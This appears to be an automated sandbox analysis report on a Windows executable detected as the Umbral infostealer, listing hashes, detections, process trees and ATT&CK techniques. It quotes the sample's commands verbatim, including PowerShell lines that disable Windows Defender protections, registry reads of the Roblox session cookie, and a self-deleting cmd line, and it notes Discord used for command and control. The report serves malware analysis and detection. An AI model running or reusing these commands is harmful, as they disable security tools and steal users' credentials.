Analysis
-
max time kernel
118s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20241023-en -
resource tags
arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system -
submitted
08-12-2024 00:48
Behavioral task
behavioral1
Sample
e6bce403ca6d89fde32903e97f5bb76dca2d6b21483c345052dab209a21618b7N.exe
Resource
win7-20241023-en
General
-
Target
e6bce403ca6d89fde32903e97f5bb76dca2d6b21483c345052dab209a21618b7N.exe
-
Size
231KB
-
MD5
81addafe30f78a103061bf331bb04350
-
SHA1
3f8bf8d7c3519f149d60d20e87ae8204f4428db8
-
SHA256
e6bce403ca6d89fde32903e97f5bb76dca2d6b21483c345052dab209a21618b7
-
SHA512
5438b5042df46e88a3495be854d20f0ecf30c389a10223703eef82b8b7538df0605e01abcda012074ac767596e91f19f1271a824943937eaff5f46a7c3abe39d
-
SSDEEP
6144:xloZM9rIkd8g+EtXHkv/iD426oJKInDAHZMK7bCFd+lP8e1mQ4i:DoZOL+EP8ToJKInDAHZMK7bCGZp
Malware Config
Signatures
-
Detect Umbral payload 1 IoCs
resource yara_rule behavioral1/memory/2800-1-0x00000000003B0000-0x00000000003F0000-memory.dmp family_umbral -
Umbral family
-
pid Process 2516 powershell.exe 1724 powershell.exe 2096 powershell.exe 2940 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts e6bce403ca6d89fde32903e97f5bb76dca2d6b21483c345052dab209a21618b7N.exe -
Deletes itself 1 IoCs
pid Process 2172 cmd.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 8 discord.com 9 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 6 ip-api.com -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2172 cmd.exe 2472 PING.EXE -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2076 wmic.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2472 PING.EXE -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 2940 powershell.exe 2096 powershell.exe 2516 powershell.exe 2336 powershell.exe 1724 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2800 e6bce403ca6d89fde32903e97f5bb76dca2d6b21483c345052dab209a21618b7N.exe Token: SeDebugPrivilege 2940 powershell.exe Token: SeDebugPrivilege 2096 powershell.exe Token: SeDebugPrivilege 2516 powershell.exe Token: SeDebugPrivilege 2336 powershell.exe Token: SeIncreaseQuotaPrivilege 3060 wmic.exe Token: SeSecurityPrivilege 3060 wmic.exe Token: SeTakeOwnershipPrivilege 3060 wmic.exe Token: SeLoadDriverPrivilege 3060 wmic.exe Token: SeSystemProfilePrivilege 3060 wmic.exe Token: SeSystemtimePrivilege 3060 wmic.exe Token: SeProfSingleProcessPrivilege 3060 wmic.exe Token: SeIncBasePriorityPrivilege 3060 wmic.exe Token: SeCreatePagefilePrivilege 3060 wmic.exe Token: SeBackupPrivilege 3060 wmic.exe Token: SeRestorePrivilege 3060 wmic.exe Token: SeShutdownPrivilege 3060 wmic.exe Token: SeDebugPrivilege 3060 wmic.exe Token: SeSystemEnvironmentPrivilege 3060 wmic.exe Token: SeRemoteShutdownPrivilege 3060 wmic.exe Token: SeUndockPrivilege 3060 wmic.exe Token: SeManageVolumePrivilege 3060 wmic.exe Token: 33 3060 wmic.exe Token: 34 3060 wmic.exe Token: 35 3060 wmic.exe Token: SeIncreaseQuotaPrivilege 3060 wmic.exe Token: SeSecurityPrivilege 3060 wmic.exe Token: SeTakeOwnershipPrivilege 3060 wmic.exe Token: SeLoadDriverPrivilege 3060 wmic.exe Token: SeSystemProfilePrivilege 3060 wmic.exe Token: SeSystemtimePrivilege 3060 wmic.exe Token: SeProfSingleProcessPrivilege 3060 wmic.exe Token: SeIncBasePriorityPrivilege 3060 wmic.exe Token: SeCreatePagefilePrivilege 3060 wmic.exe Token: SeBackupPrivilege 3060 wmic.exe Token: SeRestorePrivilege 3060 wmic.exe Token: SeShutdownPrivilege 3060 wmic.exe Token: SeDebugPrivilege 3060 wmic.exe Token: SeSystemEnvironmentPrivilege 3060 wmic.exe Token: SeRemoteShutdownPrivilege 3060 wmic.exe Token: SeUndockPrivilege 3060 wmic.exe Token: SeManageVolumePrivilege 3060 wmic.exe Token: 33 3060 wmic.exe Token: 34 3060 wmic.exe Token: 35 3060 wmic.exe Token: SeIncreaseQuotaPrivilege 2496 wmic.exe Token: SeSecurityPrivilege 2496 wmic.exe Token: SeTakeOwnershipPrivilege 2496 wmic.exe Token: SeLoadDriverPrivilege 2496 wmic.exe Token: SeSystemProfilePrivilege 2496 wmic.exe Token: SeSystemtimePrivilege 2496 wmic.exe Token: SeProfSingleProcessPrivilege 2496 wmic.exe Token: SeIncBasePriorityPrivilege 2496 wmic.exe Token: SeCreatePagefilePrivilege 2496 wmic.exe Token: SeBackupPrivilege 2496 wmic.exe Token: SeRestorePrivilege 2496 wmic.exe Token: SeShutdownPrivilege 2496 wmic.exe Token: SeDebugPrivilege 2496 wmic.exe Token: SeSystemEnvironmentPrivilege 2496 wmic.exe Token: SeRemoteShutdownPrivilege 2496 wmic.exe Token: SeUndockPrivilege 2496 wmic.exe Token: SeManageVolumePrivilege 2496 wmic.exe Token: 33 2496 wmic.exe Token: 34 2496 wmic.exe -
Suspicious use of WriteProcessMemory 36 IoCs
description pid Process procid_target PID 2800 wrote to memory of 2776 2800 e6bce403ca6d89fde32903e97f5bb76dca2d6b21483c345052dab209a21618b7N.exe 30 PID 2800 wrote to memory of 2776 2800 e6bce403ca6d89fde32903e97f5bb76dca2d6b21483c345052dab209a21618b7N.exe 30 PID 2800 wrote to memory of 2776 2800 e6bce403ca6d89fde32903e97f5bb76dca2d6b21483c345052dab209a21618b7N.exe 30 PID 2800 wrote to memory of 2940 2800 e6bce403ca6d89fde32903e97f5bb76dca2d6b21483c345052dab209a21618b7N.exe 32 PID 2800 wrote to memory of 2940 2800 e6bce403ca6d89fde32903e97f5bb76dca2d6b21483c345052dab209a21618b7N.exe 32 PID 2800 wrote to memory of 2940 2800 e6bce403ca6d89fde32903e97f5bb76dca2d6b21483c345052dab209a21618b7N.exe 32 PID 2800 wrote to memory of 2096 2800 e6bce403ca6d89fde32903e97f5bb76dca2d6b21483c345052dab209a21618b7N.exe 34 PID 2800 wrote to memory of 2096 2800 e6bce403ca6d89fde32903e97f5bb76dca2d6b21483c345052dab209a21618b7N.exe 34 PID 2800 wrote to memory of 2096 2800 e6bce403ca6d89fde32903e97f5bb76dca2d6b21483c345052dab209a21618b7N.exe 34 PID 2800 wrote to memory of 2516 2800 e6bce403ca6d89fde32903e97f5bb76dca2d6b21483c345052dab209a21618b7N.exe 36 PID 2800 wrote to memory of 2516 2800 e6bce403ca6d89fde32903e97f5bb76dca2d6b21483c345052dab209a21618b7N.exe 36 PID 2800 wrote to memory of 2516 2800 e6bce403ca6d89fde32903e97f5bb76dca2d6b21483c345052dab209a21618b7N.exe 36 PID 2800 wrote to memory of 2336 2800 e6bce403ca6d89fde32903e97f5bb76dca2d6b21483c345052dab209a21618b7N.exe 38 PID 2800 wrote to memory of 2336 2800 e6bce403ca6d89fde32903e97f5bb76dca2d6b21483c345052dab209a21618b7N.exe 38 PID 2800 wrote to memory of 2336 2800 e6bce403ca6d89fde32903e97f5bb76dca2d6b21483c345052dab209a21618b7N.exe 38 PID 2800 wrote to memory of 3060 2800 e6bce403ca6d89fde32903e97f5bb76dca2d6b21483c345052dab209a21618b7N.exe 40 PID 2800 wrote to memory of 3060 2800 e6bce403ca6d89fde32903e97f5bb76dca2d6b21483c345052dab209a21618b7N.exe 40 PID 2800 wrote to memory of 3060 2800 e6bce403ca6d89fde32903e97f5bb76dca2d6b21483c345052dab209a21618b7N.exe 40 PID 2800 wrote to memory of 2496 2800 e6bce403ca6d89fde32903e97f5bb76dca2d6b21483c345052dab209a21618b7N.exe 43 PID 2800 wrote to memory of 2496 2800 e6bce403ca6d89fde32903e97f5bb76dca2d6b21483c345052dab209a21618b7N.exe 43 PID 2800 wrote to memory of 2496 2800 e6bce403ca6d89fde32903e97f5bb76dca2d6b21483c345052dab209a21618b7N.exe 43 PID 2800 wrote to memory of 776 2800 e6bce403ca6d89fde32903e97f5bb76dca2d6b21483c345052dab209a21618b7N.exe 45 PID 2800 wrote to memory of 776 2800 e6bce403ca6d89fde32903e97f5bb76dca2d6b21483c345052dab209a21618b7N.exe 45 PID 2800 wrote to memory of 776 2800 e6bce403ca6d89fde32903e97f5bb76dca2d6b21483c345052dab209a21618b7N.exe 45 PID 2800 wrote to memory of 1724 2800 e6bce403ca6d89fde32903e97f5bb76dca2d6b21483c345052dab209a21618b7N.exe 47 PID 2800 wrote to memory of 1724 2800 e6bce403ca6d89fde32903e97f5bb76dca2d6b21483c345052dab209a21618b7N.exe 47 PID 2800 wrote to memory of 1724 2800 e6bce403ca6d89fde32903e97f5bb76dca2d6b21483c345052dab209a21618b7N.exe 47 PID 2800 wrote to memory of 2076 2800 e6bce403ca6d89fde32903e97f5bb76dca2d6b21483c345052dab209a21618b7N.exe 49 PID 2800 wrote to memory of 2076 2800 e6bce403ca6d89fde32903e97f5bb76dca2d6b21483c345052dab209a21618b7N.exe 49 PID 2800 wrote to memory of 2076 2800 e6bce403ca6d89fde32903e97f5bb76dca2d6b21483c345052dab209a21618b7N.exe 49 PID 2800 wrote to memory of 2172 2800 e6bce403ca6d89fde32903e97f5bb76dca2d6b21483c345052dab209a21618b7N.exe 51 PID 2800 wrote to memory of 2172 2800 e6bce403ca6d89fde32903e97f5bb76dca2d6b21483c345052dab209a21618b7N.exe 51 PID 2800 wrote to memory of 2172 2800 e6bce403ca6d89fde32903e97f5bb76dca2d6b21483c345052dab209a21618b7N.exe 51 PID 2172 wrote to memory of 2472 2172 cmd.exe 53 PID 2172 wrote to memory of 2472 2172 cmd.exe 53 PID 2172 wrote to memory of 2472 2172 cmd.exe 53 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 2776 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\e6bce403ca6d89fde32903e97f5bb76dca2d6b21483c345052dab209a21618b7N.exe"C:\Users\Admin\AppData\Local\Temp\e6bce403ca6d89fde32903e97f5bb76dca2d6b21483c345052dab209a21618b7N.exe"1⤵
- Drops file in Drivers directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2800 -
C:\Windows\system32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\e6bce403ca6d89fde32903e97f5bb76dca2d6b21483c345052dab209a21618b7N.exe"2⤵
- Views/modifies file attributes
PID:2776
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\e6bce403ca6d89fde32903e97f5bb76dca2d6b21483c345052dab209a21618b7N.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2940
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 22⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2096
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2516
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2336
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3060
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2496
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵PID:776
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1724
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name2⤵
- Detects videocard installed
PID:2076
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\e6bce403ca6d89fde32903e97f5bb76dca2d6b21483c345052dab209a21618b7N.exe" && pause2⤵
- Deletes itself
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:2172 -
C:\Windows\system32\PING.EXEping localhost3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2472
-
-
Network
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5631a3cdff9b037ccecce0ac400d3834c
SHA1b73cce617317f4b9b50d874e92aed722f21b3553
SHA2567c2a354e556fd31ab37fa91d9b02778441f244f32cca6bc839216f35bef744bb
SHA5122fb86072e8783922c5aa2c5965dcce2d57954fcdbaac59f6566c8ef487a5d4999b631b027a032badaebdcbbe09057bf7041c6e43a2e96844ff7a2294b060f8bc